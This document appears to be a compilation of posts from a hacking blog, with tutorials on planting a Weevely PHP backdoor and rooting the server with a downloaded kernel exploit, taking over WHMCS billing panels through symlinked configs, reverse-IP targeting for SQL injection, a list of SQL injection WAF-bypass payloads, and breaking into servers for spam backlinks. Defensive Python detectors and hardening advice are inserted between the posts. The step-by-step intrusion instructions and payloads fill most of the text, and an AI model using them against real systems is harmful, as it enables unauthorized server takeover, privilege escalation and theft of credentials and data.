Rooting a Server with Weevely

Hi guys,
Today we will learn to root a server with Weevely 🙂
Weevely is a Python script that makes a tiny backdoor and connects back to it as a shell 🙂
You can google it. It is mostly used by people who don't have open ports 🙂
So our tutorial starts from here 😉
First of all, open Weevely 🙂
Now type “./main.py -g -o /root/Desktop/backdoor.php -p r00T”
This command creates backdoor.php on the Desktop with the password r00T.
===========================================================
Now Next Step is to upload our backdoor to the server by shell and then
type “./main.py -t -u http://www.target.com/uploads/backdoor.php -p r00T” 
and then it will connect to the server 🙂
===========================================================
Now we have to find the version of the kernel it is using 🙂
To find it, type “uname -a” and it will show you the kernel version.
For example, my kernel version is 2.6.18 2012, so I will find a local root exploit for the 2.6.18 2012 kernel version 🙂
Rooting depends on local root exploits.
===========================================================
We will use “WGET” to download the local root exploit 🙂
First change the directory to “tmp” by typing: “cd /tmp/”
and now download the exploit 🙂
Then we have to compile it with this command:
“gcc 2.6.18.c -o KiDSec”
and then it will be compiled 🙂
Now chmod it by typing “chmod 777 KiDSec”
===========================================================
Now Just Simply run exploit by typing 
./KiDSec
===========================================================
Y0 Server Rooted !!
Now, to check whether the server is rooted, type “id”
and then it should say 
“uid=(root) gid=(root)”
==========================================================
Thanks For Reading My Tutorial 🙂
./TR4CK3R
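
Seen from the defending side, the steps above leave a recognizable process trail: the web server account runs uname, downloads and compiles a C file in /tmp, and a child process ends up with effective UID 0. The following Python detection logic is an added example, not part of the original tutorial; the record layout, the service account names, the download URL and the sample events are constructed assumptions.

```python
import shlex

WEB_USERS = {"www-data", "apache", "nginx", "nobody"}   # assumed service accounts
WRITABLE_DIRS = ("/tmp", "/var/tmp", "/dev/shm")
RULES = {"recon": {"uname", "id", "whoami"},
         "download": {"wget", "curl"},
         "compile": {"gcc", "cc", "make"}}

# Constructed records: (owning account, effective uid, working dir, command line).
SAMPLE_EVENTS = [
    ("www-data", 33, "/var/www/uploads", "uname -a"),
    ("www-data", 33, "/tmp", "wget http://files.example/2.6.18.c"),
    ("www-data", 33, "/tmp", "gcc 2.6.18.c -o KiDSec"),
    ("www-data", 33, "/tmp", "chmod 777 KiDSec"),
    ("www-data", 0, "/tmp", "./KiDSec"),
    ("deploy", 1001, "/home/deploy/app", "gcc -O2 main.c -o app"),
]

def in_writable_dir(path):
    return any(path == d or path.startswith(d + "/") for d in WRITABLE_DIRS)

def classify(user, euid, cwd, cmdline):
    """Return the rule names that one execution record triggers."""
    if user not in WEB_USERS or not cmdline.strip():
        return set()
    argv = shlex.split(cmdline)
    prog = argv[0].rsplit("/", 1)[-1]
    hits = {name for name, progs in RULES.items() if prog in progs}
    if in_writable_dir(cwd) and (argv[0].startswith("./") or prog == "chmod"):
        hits.add("tmp_binary_staging")
    if euid == 0:
        hits.add("web_account_euid_0")   # a web worker should never reach uid 0
    return hits

def triage(events):
    """Aggregate per account: the chain is the signal, not any single command."""
    seen = {}
    for user, euid, cwd, cmdline in events:
        seen.setdefault(user, set()).update(classify(user, euid, cwd, cmdline))
    report = {}
    for user, hits in seen.items():
        if "web_account_euid_0" in hits:
            report[user] = ("critical", sorted(hits))
        elif len(hits) >= 3:
            report[user] = ("high", sorted(hits))
        elif hits:
            report[user] = ("low", sorted(hits))
    return report
```

Mounting /tmp with noexec and keeping compilers off production web hosts removes two links of this chain; patching the kernel removes the last one.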

WHMCS Hacking

Hello Friends 🙂
I’m BaCk with A Great Tutorial again 😉
Today we will hack into WHMCS, which is also called a billing panel; domains are also registered and suspended through the WHMCS panel 🙂
Things We Need:
  • Symlink Enable Shell
  • Symlink Files
  • My Tutorial 😉
Now let's start.
First go to the shell and symlink it. There are many tutorials on symlink, so you can easily learn.
Now the thing is that we should get the config of WHMCS on the server, like the config named xyz~~whm.txt.
Open that config, copy the configuration and log into the database through sql.php or DBKiss, then go to the table named “tbladmins”. Edit the password to your own, but in MD5, and change the username if you want.
Then save. Next, copy the name of the config: if xyz~~whm.txt is the config, copy “xyz” as the user and search for it in domains.php, and you'll get the URL of the website. Then click on symlink and search the directories; most WHMCS installs have the billing panel in /clients/admin/.
After opening it, log in with the details you filled in the database. Do not enter the password in MD5; write the password which you encrypted in MD5.
I Hope Everybody Enjoyed
./TR4CK3R
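
The attack above depends on two conditions a shared-hosting administrator can check for: a symlink inside one account's web root that resolves into another account's files, and a billing configuration file that other accounts can read. The following Python audit is an added example, not part of the original tutorial; the directory layout, the account names and the configuration.php file name are constructed assumptions.

```python
import os
import tempfile

def foreign_symlinks(home_root):
    """List (account, link, target) for symlinks resolving outside the account's home."""
    findings = []
    for account in sorted(os.listdir(home_root)):
        home = os.path.realpath(os.path.join(home_root, account))
        for dirpath, dirnames, filenames in os.walk(home):   # links are not followed
            for name in dirnames + filenames:
                link = os.path.join(dirpath, name)
                if not os.path.islink(link):
                    continue
                target = os.path.realpath(link)
                if os.path.commonpath([home, target]) != home:
                    findings.append((account, os.path.relpath(link, home), target))
    return sorted(findings)

def world_readable(path):
    """True when 'other' has read permission, which is what makes the link useful."""
    return bool(os.stat(path).st_mode & 0o004)

def build_sample(root):
    """Constructed layout: one link that stays in its home and two that escape."""
    clients = os.path.join(root, "alice", "public_html", "clients")
    sym = os.path.join(root, "mallory", "public_html", "sym")
    os.makedirs(clients)
    os.makedirs(sym)
    os.makedirs(os.path.join(root, "mallory", "public_html", "img"))
    config = os.path.join(clients, "configuration.php")   # assumed config file name
    with open(config, "w") as fh:
        fh.write("<?php /* constructed placeholder, no real credentials */\n")
    os.chmod(config, 0o644)                                # weak: readable by everyone
    os.symlink(config, os.path.join(sym, "alice~~whm.txt"))
    os.symlink("/", os.path.join(sym, "root"))
    os.symlink("../img", os.path.join(sym, "pics"))        # stays inside the home
    return config

def demo():
    """Build the sample tree and return (escaping links, config world-readable?)."""
    with tempfile.TemporaryDirectory() as root:
        config = build_sample(root)
        links = [(acct, link) for acct, link, _ in foreign_symlinks(root)]
        return links, world_readable(config)
```

Setting the configuration file to mode 600 and serving sites with Apache's SymLinksIfOwnerMatch instead of FollowSymLinks closes both conditions.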

Top Android Mobiles For Hackers~

Best Android Mobiles For Hacking And Pentesting 
Hey guys, what's up? As you can read in the title, I am going to share some popular Android mobiles for hacking and pentesting.

Ok , Lets Get BuZZzZy!

Ok Lemme start it with Samsung ;D
Samsung Galaxy S2
Samsung Galaxy S2 Plus Price Pakistan
OS  Android OS, v4.1.2 (Jelly Bean) 
 Memory  8GB built-in, 1GB RAM, microSD card (supports up to 64GB) 
 Processor  Dual core 1.2 GHz, Broadcom BC28155 Chipset 

Qmobile Noir A20

OS  Android OS, 4.1 Jelly Bean 
 Memory  4GB built-in + 8GB card included in box, 1GB RAM, microSD card (supports up to 32GB) 
 Processor  Quad-core 1.2 GHz, ARMv7 Chipset, GPU (PowerVR SGX) 

Qmobile Noir A50

OS  Android Jelly Bean (v 4.1) 
 Memory  4GB ROM, 512 RAM, microSD card (supports up to 32GB) 
 Processor  1GHz Dual Core 

Huawei Ascend G510 U8951

OS  Android OS, v4.1 (Jelly Bean) 
 Memory  4GB built-in, 512MB RAM, microSD card (supports up to 32GB) 
 Processor  Dual core 1.2 GHz Cortex-A9 

Sony Xperia L 

OS  Android OS, v4.1 (Jelly Bean) 
 Memory  8GB built-in 1GB RAM, microSD Card (supports up to 32GB) 
 Processor  Dual-core 1 GHz, Qualcomm MSM8230 Snapdragon Chipset 

Samsung Galaxy Note II

OS  Android OS, v4.1.1 (Jelly Bean) 
 Memory  16/32/64GB built-in, 2GB RAM, microSD card (supports up to 64GB) 
 Processor  Quad-core 1.6 GHz Cortex-A9 

Samsung Galaxy S3

Samsung Galaxy S3 I9300 Price Pakistan
OS  Android OS, v4.0.4 (Ice Cream Sandwich) 
 Memory  16/32/64GB built-in, 1GB RAM, microSD card (supports up to 64GB) 
 Processor  Quad-core 1.4 GHz Cortex-A9 + Mali-400MP GPU, Exynos 4212 Quad 

HTC One

OS  Android OS, v4.1.2 (Jelly Bean), upgradable to v4.2.2 (Jelly Bean) 
 Memory  32/64GB built-in, 2GB RAM 
 Processor  Quad-core 1.7 GHz Krait 300, Qualcomm APQ8064T Snapdragon 600 Chipset 

Sony Xperia Z

OS  Android OS, v4.1.2 (Jelly Bean), planned upgrade to v4.2 (Jelly Bean) 
 Memory  16GB built-in 2GB RAM, microSD Card (supports up to 32GB) 
 Processor  Quad-core 1.5 GHz Krait, Qualcomm MDM9215M / APQ8064 Chipset 

How To Hack Targeted Server ?

How To Hack Your Victim’s Website ?

Umm.. in this post I'll tell you how to hack your victim's website easily ;D
This is a very well-known method, used by almost every hacker.
This method is also known as Reverse IP hacking.

In this method we will try to get access to other websites hosted on Same Server

Let the Game Begin ;D

First of all get the website you want to hack and then open CMD (Command Prompt):
Open Start Menu => Run => type cmd in the box,
or simply press the Windows logo button + R
and then type cmd in the box.

Now type ping followed by the website address and hit Enter.

Then you'll get the IP address of the website.
Now go to bing.com and type
ip:xxx.xxx.xxx.xxx .php?id=
replacing xxx with the IP address 🙂

It will give you all the websites hosted on the server.
Now you can check them for SQL injection vulnerability…
Note:- After getting access, don't forget to BUZZ the server ;D


kidsec.com
Zaid Sparrow

Advanced WAF Bypassing Techniques

How To Bypass Forbidden Error SQL Injection

Today I am going to show you how to bypass Web Application Firewalls (WAF).

Let’s Begin!

How to know if there is a Web Application Firewall?

This is pretty simple! When you try to enter a command used for SQL Injections (usually the “UNION SELECT” command), you get a 403 Error (and the website says “Forbidden” or “Not Acceptable”).

Example:

Code:
http://www.site.com/index.php?page_id=-15 UNION SELECT 1,2,3,4....
(We get a 403 Error!)


Basic/Simple Methods:

First, of course, we need to know the Basic Methods to bypass WAF…

1) Comments:
You can use comments to bypass WAF:

Code:
http://www.site.com/index.php?page_id=-15 /*!UNION*/ /*!SELECT*/ 1,2,3,4....
(First Method that can Bypass WAF)


However, most WAFs identify this method, so they still show a “Forbidden” Error…

2) Change the Case of the Letters:
You can also change the Case of the Command:

Code:
http://www.site.com/index.php?page_id=-15 uNIoN sELecT 1,2,3,4....
(Another Basic Method to Bypass WAF!)


However, as before, this trick is also detected by most WAFs!

3) Combine the previous Methods:

What you can also do is to combine the previous two methods:

Code:
http://www.site.com/index.php?page_id=-15 /*!uNIOn*/ /*!SelECt*/ 1,2,3,4....
This method is not detectable by many Web Application Firewalls!

4) Replaced Keywords:

Some Firewalls remove the “UNION SELECT” Statement when it is found in the URL… We can do this to exploit this function:

Code:
http://www.site.com/index.php?page_id=-15 UNIunionON SELselectECT 1,2,3,4....
(The "union" and the "select" will be removed, so the final result will be: "UNION SELECT" 😀 )
This method doesn’t work on ALL Firewalls, as only some of them remove the “UNION” and the “SELECT” commands when they are detected!

5) Inline Comments (Thanks to Crysan):
Some firewalls get bypassed by Inserting Inline Comments between the “Union” and the “Select” Commands:
Code:
http://www.site.com/index.php?page_id=-15 UnION/**/SElecT 1,2,3,4...
(The U is equal to "U" and S to "S". See more on the Advanced Section....)

I believe that these are the most basic Methods to WAF Bypassing! Let’s move on more advanced ones…

Advanced Methods:

Now that you have learned about Basic WAF Bypassing, I think it is good to understand more advanced Methods!

1) Buffer Overflow / Firewall Crash:
Many Firewalls are developed in C/C++ and we can Crash them using Buffer Overflow!

Code:
http://www.site.com/index.php?page_id=-15+and+(select 1)=(Select 0xAA[..(add about 1000 "A")..])+/*!uNIOn*/+/*!SeLECt*/+1,2,3,4....

(You can test if the WAF can be crashed by typing:
?page_id=null
/**//*!50000UnIOn*//*yoyu*/all/**/
/*!SeLEct*/
/*nnaa*/+1,2,3,4....

If you get a 500, you can exploit it using the Buffer Overflow Method! Thanks Crysan for the test.)

2) Replace Characters with their HEX Values (Thanks to Crysan!):
We can replace some characters with their HEX (URL-Encoded) Values.

Example:
Code:
http://www.site.com/index.php?page_id=-15 /*!union*/ /*!select*/ 1,2,3,4....
(which means "union select")
Text to Hex Encoder (Choose the “Hex Encoded for URL” result!): http://www.swingnote.com/tools/texttohex.php

3) Use other Variables or Commands instead of the common ones for SQLi:
Apart from the “UNION SELECT” other commands might be blocked.
Common Commands Blocked:

Code:
COMMAND | WHAT TO USE INSTEAD

@@version | version()
concat() | concat_ws() --> Difference between concat() and concat_ws(): http://is.gd/VEeiDU
group_concat() | concat_ws()


[!]-> You can also try to SQL Inject with the NAME_CONST Method: http://is.gd/o10i0d (Created by Downfall)
Learning MySQL Really helps on such issues! 😉


4) Misc Exploitable Functions:
Many firewalls try to offer more Protection by adding Prototype or Strange Functions! (Which, of course, we can exploit!):
Example:
The firewall below replaces “*” (asterisks) with Whitespaces! What we can do is this:

Code:
http://www.site.com/index.php?page_id=-15+uni*on+sel*ect+1,2,3,4...
(If the Firewall removes the "*", the result will be: 15+union+select....)



So, if you find such a silly function, you can exploit it, in this way! 😀

[+] In addition to the previous example, some other bypasses might be:

Code:
-15+(uNioN)+(sElECt)....

-15+(uNioN+SeleCT)+...

-15+(UnI)(oN)+(SeL)(ecT)+....

-15+union (select 1,2,3,4...)

This tut is not written by me; all credit goes to the author ~
Kidsec.com
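
Every trick in the post above works against a filter that either matches the raw request text or rewrites the value and forwards it. The following Python code is an added example, not part of the original tutorial: it runs the post's own query-string values through a literal match, a single-pass keyword remover and a matcher that canonicalizes first (decode until stable, unwrap MySQL `/*! */` comments, drop plain comments, fold case). All function names are hypothetical.

```python
import re
from urllib.parse import unquote_plus

# Query-string values taken from the examples in the post above.
PAGE_EXAMPLES = [
    "-15 UNION SELECT 1,2,3,4",
    "-15 /*!UNION*/ /*!SELECT*/ 1,2,3,4",
    "-15 uNIoN sELecT 1,2,3,4",
    "-15 /*!uNIOn*/ /*!SelECt*/ 1,2,3,4",
    "-15 UnION/**/SElecT 1,2,3,4",
    "-15+(uNioN)+(sElECt)+1,2,3,4",
    "-15 UNIunionON SELselectECT 1,2,3,4",
]

def naive_block(value):
    """Case-sensitive literal match, the kind of rule the post's tricks defeat."""
    return "UNION SELECT" in value

def strip_once(value):
    """Single-pass keyword removal; deleting text can assemble a new keyword."""
    return re.sub(r"union|select", "", value)

def canonicalize(value):
    """Reduce a parameter to roughly the form MySQL would parse."""
    prev = None
    while prev != value:                       # decode until stable (nested encoding)
        prev, value = value, unquote_plus(value)
    value = re.sub(r"/\*!\d*(.*?)\*/", r" \1 ", value, flags=re.S)  # /*!50000x*/ -> x
    value = re.sub(r"/\*.*?\*/", " ", value, flags=re.S)             # plain comments
    return re.sub(r"\s+", " ", value).lower().strip()

UNION_SELECT = re.compile(r"\bunion\b(?:\s|\(|\)|all|distinct)*\bselect\b")

def canonical_block(value):
    """Match on the canonical form and reject; never rewrite and forward."""
    return bool(UNION_SELECT.search(canonicalize(value)))

def sanitizer_creates_payload(value):
    """True when the value does not match as sent but the rewrite makes it match."""
    return not canonical_block(value) and canonical_block(strip_once(value))
```

The last sample is why a filter should block rather than strip: the request only becomes a UNION SELECT after the sanitizer has edited it. Parameterized queries in the application remain the actual fix, with the WAF as a second layer.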

BlackHat SEO – Get High Page Rank 4 Or 5

BlackHat SEO

The Fastest Way to Get Your Blog/Website Go BooM BooM…
But everything has some benefits and some losses..
But BlackHat SEO , has more losses than Benefits 🙂
umm i think 

” Losses = 10 Benefits = 4 “


Ok First Lemme Tell You What BlackHat SEO is?
BlackHat SEO is a branch of SEO 😀 It's 100% illegal.
In BlackHat SEO, webmasters use illegal techniques to trick search engines and get their web/blog to the top very fast and quickly..

Few Content Here

Content Spam 
Keyword Stuffing
Hidden Or Invisible Text
Meta-Tag Stuffing
Doorway Pages
Article Spinning
Link Spam
Link Building Softwares
Page Hijacking
etc..

There Are 3 Kinds Of SEO

1- WhiteHat SEO
2 – BlackHat SEO
3 – GreyHat SEO (Mix SEO)

WhiteHat SEO is Slow But Best 😉
BlackHat SEO is fast, but if you are using it then your blog will be penalized
GreyHat SEO is mixture Of WhiteHat SEO And BlackHat SEO

umm. now lemme come straight to my point ;D
Getting High PR Using BlackHat SEO
It's not actually BlackHat SEO, umm, but it will be counted as BlackHat SEO

r00t@T4p10N:~# Requirements

1- Knowledge Of SQL Injection
2- Havij -If You Don't Know SQL-
3- WebRoot PHP Tool
4- Patience ~

What You Have To Do?
Try to hack into webservers and then upload the Webroot PHP tool,
then you have to make a symlink to the HIGH PR websites..

Just Upload Webroot PHP Tool and Click On Domains & Username & Page Rank Tab

Find Any PR Websites => Symlink => Add Your Link => Check After 2 Weeks
You Must Have Around 7 Backlinks From HIGH Page Rank Websites !!!

Thats All 😉
Kidsec.com
Zaid Sparrow ~

WiFiKill v1.7 – WiFi EjeCtOr


WiFiKill is an Android application that lets you disable the internet connection of any IP address that uses the same router as you, i.e. a device on the same network. It is an alternative to NETCUT for Android. It simply allows you to scan your WiFi network for devices, see their vendor and cut the network connection for specified devices. This way you can get rid of network hoggers. It also gives an option to redirect HTTP traffic to a specific IP; this feature can even be used to do phishing.

Changelog:
– fixed the counter bug (I hope for the last time)
– added an option to redirect HTTP traffic to specific IP (caution! this may lead to significant CPU load)
– now successful kills are tagged by green icon on the left of IP (this is not 100% correct)


Network Security Toolkit v2.16.0-4104 Released


The Network Security Toolkit (NST Live) is a bootable ISO live CD/DVD based on Fedora. The toolkit was designed to provide easy access to best-of-breed Open Source Network Security Applications and should run on most x86/x86_64 platforms.

The main intent of developing this toolkit was to provide the network security administrator with a comprehensive set of Open Source Network Security Tools. An advanced Web User Interface (WUI) is provided for system administration, navigation, automation and configuration of many network and security applications found within the Network Security Toolkit distribution.

In the virtual world, NST can be used as a network security analysis, validation and monitoring tool on enterprise virtual servers hosting virtual machines. Network Security Toolkit also makes an excellent tool to help one with crash recovery troubleshooting scenarios and diagnostics.

Yaptest – Penetration Framework


It is a penetration testing framework that helps automate the boring parts of pentests. Yaptest aims to make it easy for a pentester to automate parts of testing on the fly. This is particularly useful when testing very large networks. Below are some examples of tasks which would be easy to automate using yaptest:
  • Run nikto on anything nmap thinks is an HTTP service
  • Run hydra on every host with TCP port 21 open
  • Attempt to upload a file to any TFTP servers found
  • Run onesixtyone on all hosts that are up
  • Try metasploit’s solaris_kcms_readfile exploit against any hosts running kcmsd
Yaptest is the glue between your favourite tools and the knowledge base gathered during your pentest. It handles all the mundane stuff that can easily be automated and leaves you free to get on with owning boxes demonstrating risk using techniques that yaptest doesn’t know about yet.